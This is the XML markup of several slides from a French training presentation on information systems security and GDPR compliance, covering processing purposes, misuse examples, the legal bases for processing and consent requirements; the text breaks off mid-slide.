              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>Sécurité des systèmes d’informations :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Ensemble de ressources, à la fois </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>humaines</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>matérielles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>immatérielles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> dont le rôle est de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>collecter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>stocker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>traiter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>distribuer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> de l’information. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E9442E4-3FD3-25E6-7F3D-4C1057163F27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C3DB2ADC-AF19-4574-8C10-79B5B04FCA27}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="212805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700635" y="922096"/>
            <a:ext cx="10691265" cy="864072"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>RGPD – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>La finalité de traitement</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="73" name="Straight Connector 72">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EF1A8C6-8F60-4EF2-B4D7-A5A5E94F69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1267968" y="1786168"/>
            <a:ext cx="9651044" cy="4356611"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Objectif en vue duquel les données sont collectées, enregistrées, exploitées, transmises, conservées, etc. pour l’organisme.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Exemple de finalité</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>La gestion des recrutements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>La gestion de la clientèle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>La gestion des usagers d’un service public</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>La finalité est obligatoire, préalable au traitement, légal et légitime par rapport au contexte d’activité de l’organisme.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="75" name="Straight Connector 74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD9760AA-CA3F-4C65-B688-B44307731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40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="274294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700635" y="922096"/>
            <a:ext cx="10691265" cy="864072"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>RGPD – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>La finalité de traitement</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="73" name="Straight Connector 72">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EF1A8C6-8F60-4EF2-B4D7-A5A5E94F69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1267968" y="1786168"/>
            <a:ext cx="9651044" cy="4356611"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Les finalités de traitement suivantes sont-elles explicites ? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Recueillir les données des élèves </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Organiser la répartition des élèves par section </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Analyser la navigation des conducteurs automobiles </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Faire de la publicité ciblée</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Vidéo protection d’un salarié en continu </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Livraison à l’adresse du domicile d’un client </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Calcul d'une taxe au regard de la situation économique d’un client </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Géolocalisation des utilisateurs d’une application mobile de discussion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="75" name="Straight Connector 74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD9760AA-CA3F-4C65-B688-B44307731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41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="96404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700635" y="922096"/>
            <a:ext cx="10691265" cy="864072"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>RGPD – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>La finalité de traitement - Exemples</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="73" name="Straight Connector 72">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EF1A8C6-8F60-4EF2-B4D7-A5A5E94F69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1267968" y="1786168"/>
            <a:ext cx="9651044" cy="4356611"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Exemples de détournement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Fichiers des employés d’une société pour la gestion des ressources humaines et la masse salariale</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>Détournement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> : transmission des adresses de messageries à une entreprise partenaire pour la prospection commerciale des salariés</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Dispositif de géolocalisation des véhicules du personnel pour assurer la gestion des livraisons client.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>Détournement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> : utilisation du dispositif par ledit employeur afin de contrôler le temps de travail des salariés</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="75" name="Straight Connector 74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD9760AA-CA3F-4C65-B688-B44307731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42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="218222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700635" y="922096"/>
            <a:ext cx="10691265" cy="864072"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>RGPD – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>La Licéité du traitement</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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1267968" y="1786168"/>
            <a:ext cx="9651044" cy="4846280"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Le traitement doit être explicitement permis ou ne pas être interdit.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>La </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>personne concernée </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>par le traitement a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>donné son consentement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>au traitement pour une ou des finalités explicites.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Le traitement est </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nécessaire à l’exécution d’un contrat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>par lequel la personne concernée est partie prenante ou à l’origine de la demande du contrat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Le traitement est </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nécessaire au respect d’une obligation légale </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>pour le responsable de traitement </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Le traitement est </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nécessaire à la sauvegarde des intérêts vitaux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>de la personne concernée ou d’autre personne physique</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Le traitement est </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nécessaire à l’exécution d’une mission</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> d’intérêt public ou relevant de l’exercice de l’autorité publique</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Le traitement est </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nécessaire aux fins des intérêts légitimes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>du responsable de traitement dans le respect de la législation et des droits de la personne concernée</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="73617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700635" y="922096"/>
            <a:ext cx="10691265" cy="864072"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>RGPD – La Licéité du traitement – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Le Consentement</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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800100" y="1786168"/>
            <a:ext cx="10118912" cy="4935307"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Doit correspondre à un seul traitement et pour une finalité déterminée </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Plusieurs finalités nécessitent plusieurs consentements pour chacune</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Une information préalable est nécessaire, une information claire et compréhensible</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>L’identité du RT </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les finalités du traitement </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les catégories de données collectées </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>L’existence du droit de retrait</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
